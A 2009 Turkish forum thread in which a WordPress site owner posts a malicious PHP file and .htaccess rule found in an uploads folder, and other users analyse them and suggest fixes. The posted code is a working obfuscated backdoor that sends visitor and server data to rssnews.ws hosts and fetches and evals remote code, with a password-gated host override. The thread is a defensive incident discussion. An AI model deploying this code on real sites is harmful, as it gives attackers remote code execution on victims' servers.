• 28-04-2009, 15:33:56
    #1
    Merhabalar
    Wordpress film tanıtım sitemin bu gün yedegini aldım öyle incelerken gözüme 6 rakalı bi php dosyası ile htaccess takıldı gözüme.Baktım içinde base64 ile şifrelenmiş kodlar vardı.Bu nereden gelebilir?uploads klasörünün yazılabilirliği 777.

    Php kodu şu:
    <? error_reporting(0);
    $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
    $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
    $f=base64_decode("cnNzbmV3cy53cw==");    
    if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="4464a22ab9f2c3064cb61573d0f717cf") $f=$_REQUEST["id"];
    if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
    else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
    else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $o=curl_exec($cu);    
    curl_close($cu);
    eval($o);
    };
    die(); ?>
    Htaccess Kodu Şu:
    Options -MultiViews
    ErrorDocument 404 //wp-content/uploads/987671.php
    Yardımlarınızı bekliyorum
  • 29-04-2009, 22:21:45
    #2
    Varmı acaba yardım edebilecek 777 chmodlu klasörlere yapışıyo bu illet
  • 29-04-2009, 22:27:23
    #3
    Neden uploads klasörünün chmodu 755 değil de 777?
  • 29-04-2009, 22:42:13
    #4
    404 sayfaları php dosyasına yönleniyor ve o da yapılan isteği alarak inceliyor, ardından http://www.rssnews.ws/ sitesi ile iletişime geçiyor. Tam emin değilim fakat siten üzerinden http://www.rssnews.ws/ 'e saldırı yapılıyormuş gibi geldi bana. çünkü bu sitenin alt sayfalarını rastgele bir şekilde çağırmakta.
  • 29-04-2009, 22:42:41
    #5
    Resimleri Nasıl yükleyecegim :S
    777 olması lazım illaki

    @Weya
    Evet dosyanın ne iş yaptıgını çözdümde nereden geldigini çözemedim.Yeni çıkmış sanırım bu.Ayrıca http://7.rssnews.ws/en/ ye yönlendiriyor.Orasıda htaccess atarak para kazanma sitesi falan diyor
  • 28-05-2009, 22:29:26
    #6
    Yeni sahte reklam yayıncılıgı ile para kazanmayı planlayan bi grup

    Php deki base64 kodları decode edersen şunlar çıkıyor

    Earn money with your site
    Earn money with your site
    http://ads.rssnews.ws

    Banda bir maille geldi FTP troj. Dropper yalnız kodun içinde bulunan md5 kodu bende farklı

    İndirdiğim dosyada : md5($_REQUEST["q"])=="36e0c428e3e69434f817711d290d8dfb")

    sende
    md5($_REQUEST["q"])=="4464a22ab9f2c3064cb61573d0f717cf") $f=$_REQUEST["id"];
  • 29-07-2009, 09:30:30
    #7
    Üyeliği durduruldu
    htaccess e erişebilmeleri için wp sürümüne göre belki adminden yapmışlardır yada shell upload edip onu çalıştırdıysalar .htaccess içeriğini düzenlemişte olabilirler , uploads klasörünün adını değiştirmeyi dene wp_users tablosuna bir bak senden başka birileri var mı diye
  • 22-08-2009, 01:45:34
    #8
    Aynı sorun tekrar geldi başıma nasıl kurtulacaz arkadaşlar
  • 22-08-2009, 01:54:30
    #9
    chmod 755 de de yüklemesi gerekiyor,yani öyle hatırlıyorum ben.